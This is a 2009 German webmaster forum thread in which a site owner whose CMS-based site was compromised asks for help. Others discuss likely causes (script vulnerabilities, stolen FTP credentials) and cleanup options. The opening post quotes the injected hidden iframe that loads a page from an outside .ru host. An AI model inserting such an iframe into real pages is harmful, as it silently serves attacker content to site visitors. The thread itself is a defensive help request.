scheisse gehackt!!

Beitrag von **dominik1977** » 09.07.2009, 17:18

Hallo,

sag mal ich habe auf jeder index seite auf meiner webseite
folgenden code <iframe src="https://u1l.ru:8080/index.php" width=124 height=197 style="visibility: hidden"></iframe>

da war jemand aktiv bei mir... habe einen debug an 1und1 gesendet da jemand von dort aus aktiv war. Aber ich weiss nicht was ich machen kann Passwoerter sind so geaendert 8 stellig das es eigentlich sicher ist.!

mhh was will der auf meiner seite ??? Und was kann ich nun noch tun...

von **Anzeige von ABAKUS** »

Beitrag von **smilla** » 09.07.2009, 17:23

Denke weniger das es an 1und1 liegt, sondern dass deine Script lücken haben, die Angreifer ausnutzen konnten.

Beitrag von **mgutt** » 09.07.2009, 17:29

Scriptlücke oder Trojaner, der Dein FTP-Passwort geklaut hat.

Beitrag von **philophax** » 09.07.2009, 17:32

CMS?
Hatten wir letztes Jahr durch eine Erweiterung im Typo3.
Die sind rein, haben das adminpassword ausgespäht, alle index.htm* mit diesem Müll vollgespammt und ein kleines Prog (oder was auch immer - nicht meine Baustelle) dagelassen, das die Änderungen im Passwordbereich verschickt hat.
Wir haben alles vom Netz genommen und einen neuen Server aufgesetzt

Beitrag von **dominik1977** » 09.07.2009, 17:42

ja cms...

wuerdet ihr nun das passwort aendern ich habe es schon letzte woche die sind trotzdem wieder rein .

Beitrag von **philophax** » 09.07.2009, 17:44

https://www.abakus-internet-marketing.d ... tml#456597

Beitrag von **ErwinRommel** » 09.07.2009, 17:44

Dann liegt es vermutlich an einer Scriptlücke und hat nichts mit dem FTP-PW zu tun. Nutzt du die aktuellste Version deines CMS?

Beitrag von **dominik1977** » 09.07.2009, 17:51

habe nun mal was in php.ini verändert mal schauen ob nun ruhe ist!!
so ein scheiss auf allen index seiten und das sind 1000 seiten .....

Beitrag von **JohnBi** » 09.07.2009, 17:55

Phase HTML Editor 5.0 - Dateiübergreifendes Suchen und Ersetzen, dann ist die Arbeit in genau 10 Sekunden erledigt ...

Beitrag von **dominik1977** » 09.07.2009, 18:01

mmmhhh das habe ich auch! Wie kann ich das machen John Bi???

Beitrag von **dominik1977** » 09.07.2009, 18:10

kann man die dateien vom ftp server laden und dann den code via Dateiübergreifendes Suchen und Ersetzen entfernen?

Beitrag von **e-fee** » 09.07.2009, 18:11

Nu ja, also wenn es ein CMS ist, dann liegen die Inhalte ja eh in einer Datenbank (da ist dann nix mehr mit Phase 5) - oder der Schadcode ist einer Datei des CMS quasi hardcodiert wie etwa ein Footer-Link, das ändert man dann genau EINmal.

Beitrag von **JohnBi** » 09.07.2009, 18:31

dominik1977 hat geschrieben:kann man die dateien vom ftp server laden und dann den code via Dateiübergreifendes Suchen und Ersetzen entfernen?

ganz genau

Beitrag von **3DCG** » 09.07.2009, 19:04

https://hosts-file.net/?s=77.37.19.173&view=matches

.

Beitrag von **philophax** » 10.07.2009, 07:12

Bei uns damals waren das viele unterschiedliche Code-Schnipsel. Auch ca 1000 HTML-Seiten (einzeln von Hand ...) - und ein paar Typo3-Projekte. Da wars schlimmer, die haben wir auch einzeln und von Hand umgezogen. Neuer Server, alter Server vom Netz - und dann die Inhalte händisch neu eingepflegt. Dieser Müll-Code (iframe, php, javascript) steckte sogar in den Navigationpunkten vom Typo3 - und im Quelltext von .gifs - und natürlich in allen möglichen Datenbankinhalten.